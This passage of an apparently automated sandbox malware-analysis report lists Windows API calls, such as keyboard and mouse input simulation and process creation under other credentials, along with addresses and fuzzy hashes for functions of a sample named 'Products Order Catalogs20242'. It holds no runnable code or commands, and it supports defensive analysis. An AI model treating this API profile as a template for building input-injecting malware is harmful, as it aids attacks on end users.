                                                                                                • Instruction Fuzzy Hash: CD613B70504202EFCB10EF29D58096AB3E5FF48305B50496EF8859B306D738EE59DB9A
                                                                                                APIs
                                                                                                • GetKeyboardState.USER32(?,?,00000001,00000001,?,00000000), ref: 0044C588
                                                                                                • SetKeyboardState.USER32(00000080), ref: 0044C59B
                                                                                                • PostMessageW.USER32(?,00000104,?,?), ref: 0044C5EC
                                                                                                • PostMessageW.USER32(?,00000100,?,?), ref: 0044C610
                                                                                                • PostMessageW.USER32(?,00000102,?,00000001), ref: 0044C637
                                                                                                • SendInput.USER32 ref: 0044C6E2
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1761753476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1761722582.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761810023.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761851525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Products Order Catalogs20242.jbxd
                                                                                                Similarity
                                                                                                • API ID: MessagePost$KeyboardState$InputSend
                                                                                                • String ID:
                                                                                                • API String ID: 2221674350-0
                                                                                                • Opcode ID: 061e63fcf1402e721e52ee56d2f22f81c2cbe03cfd8f861d8ff00d299370d474
                                                                                                • Instruction ID: 3a634557d1668dba9f4fbb3ffee1259adddcddb7f3fce46f2ce6721246940f3b
                                                                                                • Opcode Fuzzy Hash: 061e63fcf1402e721e52ee56d2f22f81c2cbe03cfd8f861d8ff00d299370d474
                                                                                                • Instruction Fuzzy Hash: A24148725053486AF760EF209C80BFFBB98EF95324F04151FFDC412281D66E984987BA
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1761753476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1761722582.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761810023.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761851525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Products Order Catalogs20242.jbxd
                                                                                                Similarity
                                                                                                • API ID: _wcscpy$_wcscat
                                                                                                • String ID:
                                                                                                • API String ID: 2037614760-0
                                                                                                • Opcode ID: f99e136c889cacb8689bc9f00eee4ad51686cf745bff212a4790763dd87d00cb
                                                                                                • Instruction ID: 871aa96d6b0d5f43eceffdadd72b032f7becd6ba50fbda5e2bca5dd503650597
                                                                                                • Opcode Fuzzy Hash: f99e136c889cacb8689bc9f00eee4ad51686cf745bff212a4790763dd87d00cb
                                                                                                • Instruction Fuzzy Hash: 7D41BD31901A256BDE317F55D880BBB7358DFA1314F84006FF98247313EA6E5892C6BE
                                                                                                APIs
                                                                                                • BeginPaint.USER32(00000000,?,004A83D8,?), ref: 00447B9D
                                                                                                • GetWindowRect.USER32(?,?), ref: 00447C1B
                                                                                                • ScreenToClient.USER32(?,?), ref: 00447C39
                                                                                                • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00447C4C
                                                                                                • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 00447C93
                                                                                                • EndPaint.USER32(?,?), ref: 00447CD1
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1761753476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1761722582.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761810023.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761851525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Products Order Catalogs20242.jbxd
                                                                                                Similarity
                                                                                                • API ID: Paint$BeginClientRectRectangleScreenViewportWindow
                                                                                                • String ID:
                                                                                                • API String ID: 4189319755-0
                                                                                                • Opcode ID: 37bca05dc5f282a43c1c57c3b808f61ec058395b4d713bcb6da44fc2610780a1
                                                                                                • Instruction ID: de699fe3e67e71f806f86ee7feca1bcffcb0489daa19151882f3061068cc4b26
                                                                                                • Opcode Fuzzy Hash: 37bca05dc5f282a43c1c57c3b808f61ec058395b4d713bcb6da44fc2610780a1
                                                                                                • Instruction Fuzzy Hash: D14182705043019FE320DF15C8C8F7B7BA8EB89724F04466EF9548B391DB74A846CB69
                                                                                                APIs
                                                                                                • InterlockedExchange.KERNEL32(?,000001F5), ref: 0044B490
                                                                                                  • Part of subcall function 0041171A: _malloc.LIBCMT ref: 00411734
                                                                                                • ReadFile.KERNEL32(?,?,0000FFFF,?,00000000), ref: 0044B4C2
                                                                                                • EnterCriticalSection.KERNEL32(00000000), ref: 0044B4E3
                                                                                                • LeaveCriticalSection.KERNEL32(00000000), ref: 0044B5A0
                                                                                                • ReadFile.KERNEL32(?,?,0000FFFF,?,00000000), ref: 0044B5BB
                                                                                                  • Part of subcall function 0041171A: std::bad_alloc::bad_alloc.LIBCMT ref: 00411757
                                                                                                  • Part of subcall function 0041171A: std::bad_exception::bad_exception.LIBCMT ref: 0041176B
                                                                                                  • Part of subcall function 0041171A: __CxxThrowException@8.LIBCMT ref: 00411779
                                                                                                • InterlockedExchange.KERNEL32(?,000001F6), ref: 0044B5D1
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1761753476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1761722582.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761810023.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761851525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Products Order Catalogs20242.jbxd
                                                                                                Similarity
                                                                                                • API ID: CriticalExchangeFileInterlockedReadSection$EnterException@8LeaveThrow_mallocstd::bad_alloc::bad_allocstd::bad_exception::bad_exception
                                                                                                • String ID:
                                                                                                • API String ID: 1726766782-0
                                                                                                • Opcode ID: 16d5c57b5e53c2061fc4ac4ded6e87df9b6247511e9ffc13c2dfc8627616166f
                                                                                                • Instruction ID: bf52b5dc2e344941501510e432fc863898df75637e45487ca8cd05157db66b41
                                                                                                • Opcode Fuzzy Hash: 16d5c57b5e53c2061fc4ac4ded6e87df9b6247511e9ffc13c2dfc8627616166f
                                                                                                • Instruction Fuzzy Hash: 09415C75104701AFD320EF26D845EABB3F8EF88708F008E2DF59A92650D774E945CB6A
                                                                                                APIs
                                                                                                • ShowWindow.USER32(?,00000000,?,?,?,?,00448962,004A83D8,?,?), ref: 004410F9
                                                                                                • EnableWindow.USER32(?,00000000), ref: 0044111A
                                                                                                • ShowWindow.USER32(?,00000000,?,?,?,?,00448962,004A83D8,?,?), ref: 00441183
                                                                                                • ShowWindow.USER32(?,00000004,?,?,?,00448962,004A83D8,?,?), ref: 00441192
                                                                                                • EnableWindow.USER32(?,00000001), ref: 004411B3
                                                                                                • SendMessageW.USER32(?,0000130C,?,00000000), ref: 004411D5
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1761753476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1761722582.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761810023.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761851525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Products Order Catalogs20242.jbxd
                                                                                                Similarity
                                                                                                • API ID: Window$Show$Enable$MessageSend
                                                                                                • String ID:
                                                                                                • API String ID: 642888154-0
                                                                                                • Opcode ID: c853c7407bbaf9010c68549c691492fdcd401e5b0cb22aeb5446aebbed6f20c9
                                                                                                • Instruction ID: 824eeaafe1f931a994963cd163acc5b0ce47b26168a6fd4ee38d593e4569daee
                                                                                                • Opcode Fuzzy Hash: c853c7407bbaf9010c68549c691492fdcd401e5b0cb22aeb5446aebbed6f20c9
                                                                                                • Instruction Fuzzy Hash: 14417770604245DFE725CF14C984FA6B7E5BF89300F1886AEE6859B3B2CB74A881CB55
                                                                                                APIs
                                                                                                • SendMessageW.USER32(00000000,00001024,00000000,?), ref: 004490E3
                                                                                                • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004490F8
                                                                                                • SendMessageW.USER32(00000000,0000111E,00000000,?), ref: 0044910D
                                                                                                • InvalidateRect.USER32(?,00000000,00000001), ref: 00449124
                                                                                                • GetWindowLongW.USER32(00000000,000000F0), ref: 0044912F
                                                                                                • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 0044913C
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1761753476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1761722582.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761810023.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761851525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Products Order Catalogs20242.jbxd
                                                                                                Similarity
                                                                                                • API ID: MessageSend$LongWindow$InvalidateRect
                                                                                                • String ID:
                                                                                                • API String ID: 1976402638-0
                                                                                                • Opcode ID: 2b574cf222373ea94a5f8b1e2da5d15417ee742d7ff148607d59a4e94613559a
                                                                                                • Instruction ID: 8b80d2acd15126bdfc8b54909556444574c0e56a9806921f1e0b477f33817628
                                                                                                • Opcode Fuzzy Hash: 2b574cf222373ea94a5f8b1e2da5d15417ee742d7ff148607d59a4e94613559a
                                                                                                • Instruction Fuzzy Hash: F231B476244202AFF224DF04DC89FBBB7A9F785321F14492EF291973D0CA75AC469729
                                                                                                APIs
                                                                                                • GetForegroundWindow.USER32 ref: 00442597
                                                                                                  • Part of subcall function 004344B7: GetWindowRect.USER32(?,?), ref: 004344D3
                                                                                                • GetDesktopWindow.USER32 ref: 004425BF
                                                                                                • GetWindowRect.USER32(00000000), ref: 004425C6
                                                                                                • mouse_event.USER32(00008001,?,?,?,?), ref: 004425F5
                                                                                                  • Part of subcall function 00436272: Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,0044269D,0000000A), ref: 00436287
                                                                                                • GetCursorPos.USER32(?), ref: 00442624
                                                                                                • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00442690
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1761753476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1761722582.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761810023.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761851525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Products Order Catalogs20242.jbxd
                                                                                                Similarity
                                                                                                • API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
                                                                                                • String ID:
                                                                                                • API String ID: 4137160315-0
                                                                                                • Opcode ID: 9bf1d5af4d3523281d87c855d40d0150606dc562a9e0308dc2a2f88b36285eae
                                                                                                • Instruction ID: 1581b522c3ee05a339ffa1fd07f9e8cd23967deed6539873686ea33d82c69dd2
                                                                                                • Opcode Fuzzy Hash: 9bf1d5af4d3523281d87c855d40d0150606dc562a9e0308dc2a2f88b36285eae
                                                                                                • Instruction Fuzzy Hash: 7C31C1B2104306ABD310DF54CD85E6BB7E9FB98304F004A2EF94597281E675E9058BA6
                                                                                                APIs
                                                                                                • SendMessageW.USER32(?,000000F1,?,00000000), ref: 0044886C
                                                                                                • EnableWindow.USER32(004A83D8,00000000), ref: 00448BAB
                                                                                                • EnableWindow.USER32(004A83D8,00000001), ref: 00448BC1
                                                                                                • ShowWindow.USER32(004A83D8,00000000,004A83D8,?,?), ref: 00448C37
                                                                                                • ShowWindow.USER32(004A83D8,00000004,004A83D8), ref: 00448C43
                                                                                                • EnableWindow.USER32(004A83D8,00000001), ref: 00448C58
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1761753476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1761722582.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761810023.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761851525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Products Order Catalogs20242.jbxd
                                                                                                Similarity
                                                                                                • API ID: Window$Enable$Show$MessageSend
                                                                                                • String ID:
                                                                                                • API String ID: 1871949834-0
                                                                                                • Opcode ID: 703f0702a5e3ae6889c0b2c4cbd553a5347372704319c0c884d711360b5070ea
                                                                                                • Instruction ID: fbfed122d4da650e42f877d7e8bff2bfe9b33138fa51555fe8345b8bcc16d821
                                                                                                • Opcode Fuzzy Hash: 703f0702a5e3ae6889c0b2c4cbd553a5347372704319c0c884d711360b5070ea
                                                                                                • Instruction Fuzzy Hash: A731F3B07443819BF7248E14C8C4BAFB7D0AB95345F08482EF981A63D1DBAC9846872A
                                                                                                APIs
                                                                                                • _memset.LIBCMT ref: 0044961A
                                                                                                • SendMessageW.USER32 ref: 0044964A
                                                                                                  • Part of subcall function 00433A98: _wcspbrk.LIBCMT ref: 00433AAC
                                                                                                • SendMessageW.USER32(?,00001074,?,00000001), ref: 004496AC
                                                                                                • _wcslen.LIBCMT ref: 004496BA
                                                                                                • _wcslen.LIBCMT ref: 004496C7
                                                                                                • SendMessageW.USER32(?,00001074,?,?), ref: 004496FD
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1761753476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1761722582.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761810023.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761851525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Products Order Catalogs20242.jbxd
                                                                                                Similarity
                                                                                                • API ID: MessageSend$_wcslen$_memset_wcspbrk
                                                                                                • String ID:
                                                                                                • API String ID: 1624073603-0
                                                                                                • Opcode ID: 3158986b153f08837b9b71a8f77f3cc169978b1c24ba43a32ffefb24081b9654
                                                                                                • Instruction ID: 7e49a266cf7116299f7bc8659d1ce07b00adedb8b3f1b428e1954e4b11147a1e
                                                                                                • Opcode Fuzzy Hash: 3158986b153f08837b9b71a8f77f3cc169978b1c24ba43a32ffefb24081b9654
                                                                                                • Instruction Fuzzy Hash: B631CA71508300AAE720DF15DC81BEBB7D4EBD4720F504A1FFA54862D0EBBAD945C7A6
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1761753476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1761722582.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761810023.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761851525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Products Order Catalogs20242.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 8dc28afdcb3e23db499faf1906c1cec9916ddd90de084288035f36419de8ba35
                                                                                                • Instruction ID: 0263b137e1f68684b0dae4bb7f633391a2f723f0f4072b7ce39308acd6c8c458
                                                                                                • Opcode Fuzzy Hash: 8dc28afdcb3e23db499faf1906c1cec9916ddd90de084288035f36419de8ba35
                                                                                                • Instruction Fuzzy Hash: 31219272245110ABE7108B68DCC4B6F7798EB96374F240A3AF512C61E1EA7998C1C769
                                                                                                APIs
                                                                                                • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 004555AD
                                                                                                • DestroyWindow.USER32(?,?,?,?,?), ref: 00455640
                                                                                                • DeleteObject.GDI32(?), ref: 0045564E
                                                                                                • DeleteObject.GDI32(?), ref: 0045565C
                                                                                                • DestroyIcon.USER32(?,?,?,?,?), ref: 0045566A
                                                                                                • DestroyWindow.USER32(?,?,?,?,?), ref: 00455678
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1761753476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1761722582.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761810023.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761851525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Products Order Catalogs20242.jbxd
                                                                                                Similarity
                                                                                                • API ID: DestroyWindow$DeleteObject$IconMove
                                                                                                • String ID:
                                                                                                • API String ID: 1640429340-0
                                                                                                • Opcode ID: da39536b61dc90218e8938c0c8165bcff49a91d8f884d8405ba8ed69dafdd4fa
                                                                                                • Instruction ID: 2ee25f48dcb0ad8048bc4d9c922f6cac320a9d705fdb810e808868a6102f62dc
                                                                                                • Opcode Fuzzy Hash: da39536b61dc90218e8938c0c8165bcff49a91d8f884d8405ba8ed69dafdd4fa
                                                                                                • Instruction Fuzzy Hash: 05312770200A419FD724DF24C998B3A73F9FB44312F4485AAE945CB266E778EC49CB69
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1761753476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1761722582.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761810023.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761851525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Products Order Catalogs20242.jbxd
                                                                                                Similarity
                                                                                                • API ID: __fileno__setmode$DebugOutputString_fprintf
                                                                                                • String ID:
                                                                                                • API String ID: 3354276064-0
                                                                                                • Opcode ID: 44da5cbe136b9a97bfd5e2050e6700f1212f0f901edc4668462b95a159366457
                                                                                                • Instruction ID: 1e9a75ed7ce68f0ee686932f25d41d1f14ae1a91d469003489e3a0780bce169f
                                                                                                • Opcode Fuzzy Hash: 44da5cbe136b9a97bfd5e2050e6700f1212f0f901edc4668462b95a159366457
                                                                                                • Instruction Fuzzy Hash: 6D11F3B2D0830136D500BA366C02AAF7A5C4A91B5CF44056EFD4563293EA2DAA4943FF
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1761753476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1761722582.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761810023.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761851525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Products Order Catalogs20242.jbxd
                                                                                                Similarity
                                                                                                • API ID: Destroy$DeleteMenuObject$IconWindow
                                                                                                • String ID:
                                                                                                • API String ID: 752480666-0
                                                                                                • Opcode ID: e2db828b4da75c1988a3618645d7ad87c2567147b1e4a2a373431826dce2281b
                                                                                                • Instruction ID: bf467a0aa8f060071afd9cdae546a2eb92d9c059e8a57ac1e588bb5f3fc3a395
                                                                                                • Opcode Fuzzy Hash: e2db828b4da75c1988a3618645d7ad87c2567147b1e4a2a373431826dce2281b
                                                                                                • Instruction Fuzzy Hash: 26215E30200A019FC724DF24D5E8B7AB7A9FB44312F50855EED498B392CB39EC89CB59
                                                                                                APIs
                                                                                                • DestroyWindow.USER32(00000000), ref: 0045527A
                                                                                                • ImageList_Destroy.COMCTL32(?), ref: 0045528C
                                                                                                • DeleteObject.GDI32(?), ref: 0045564E
                                                                                                • DeleteObject.GDI32(?), ref: 0045565C
                                                                                                • DestroyIcon.USER32(?,?,?,?,?), ref: 0045566A
                                                                                                • DestroyWindow.USER32(?,?,?,?,?), ref: 00455678
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1761753476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1761722582.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761810023.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761851525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Products Order Catalogs20242.jbxd
                                                                                                Similarity
                                                                                                • API ID: Destroy$DeleteObjectWindow$IconImageList_
                                                                                                • String ID:
                                                                                                • API String ID: 3275902921-0
                                                                                                • Opcode ID: 9ca718b8a23ef3076e20a4bf5a66fd8e296fb8dfd37af4e8726ba93a3cadf818
                                                                                                • Instruction ID: c357af2a313eda44c34a26cb015c973203dd8f66e4d80e74dc1abfaeb9ce60f9
                                                                                                • Opcode Fuzzy Hash: 9ca718b8a23ef3076e20a4bf5a66fd8e296fb8dfd37af4e8726ba93a3cadf818
                                                                                                • Instruction Fuzzy Hash: 2D217E70604A019BC714DF79D99466AB7A5BF44311F40856EF919CB342DB38E849CF68
                                                                                                APIs
                                                                                                • GetCurrentProcess.KERNEL32(0000000A,?,?,?,?,?,00446540,?,?,?,?,?,?,?,?,?), ref: 0043935D
                                                                                                • OpenProcessToken.ADVAPI32(00000000,?,00000000,00464227,00000000,?,?,?,?,?,?,?,?), ref: 00439364
                                                                                                • CreateEnvironmentBlock.USERENV(?,?,00000001,?,00000000,00464227,00000000,?,?,?,?,?,?,?,?), ref: 00439376
                                                                                                • CloseHandle.KERNEL32(?,?,00000000,00464227,00000000,?,?,?,?,?,?,?,?), ref: 00439383
                                                                                                • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,?,?,?,?), ref: 004393C0
                                                                                                • DestroyEnvironmentBlock.USERENV(?,?,00000000,00464227,00000000,?,?,?,?,?,?,?,?), ref: 004393D4
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1761753476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1761722582.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761810023.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761851525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Products Order Catalogs20242.jbxd
                                                                                                Similarity
                                                                                                • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                                                                                                • String ID:
                                                                                                • API String ID: 1413079979-0
                                                                                                • Opcode ID: 1d720b0393062126ad9b64f1bf0a3b497d62ac8a089cd0237a290436ac7c4432
                                                                                                • Instruction ID: 8c652321442b38080740e7d333ba663a52d3460857ef2618669649d87ea194c0
                                                                                                • Opcode Fuzzy Hash: 1d720b0393062126ad9b64f1bf0a3b497d62ac8a089cd0237a290436ac7c4432
                                                                                                • Instruction Fuzzy Hash: 7B2150B2208300ABD314CB65D854EABB7EDEBCD754F084E1DF989A3250C7B4E901CB25
                                                                                                APIs
                                                                                                • ___set_flsgetvalue.LIBCMT ref: 0041418F
                                                                                                • __calloc_crt.LIBCMT ref: 0041419B
                                                                                                • __getptd.LIBCMT ref: 004141A8
                                                                                                • CreateThread.KERNEL32(?,?,004140DB,00000000,?,?), ref: 004141DF
                                                                                                • GetLastError.KERNEL32(?,?,?,?,?,?,00000000), ref: 004141E9
                                                                                                • __dosmaperr.LIBCMT ref: 00414201
                                                                                                  • Part of subcall function 00417F23: __getptd_noexit.LIBCMT ref: 00417F23
                                                                                                  • Part of subcall function 00417EBB: __decode_pointer.LIBCMT ref: 00417EC6
                                                                                                Memory Dump Source
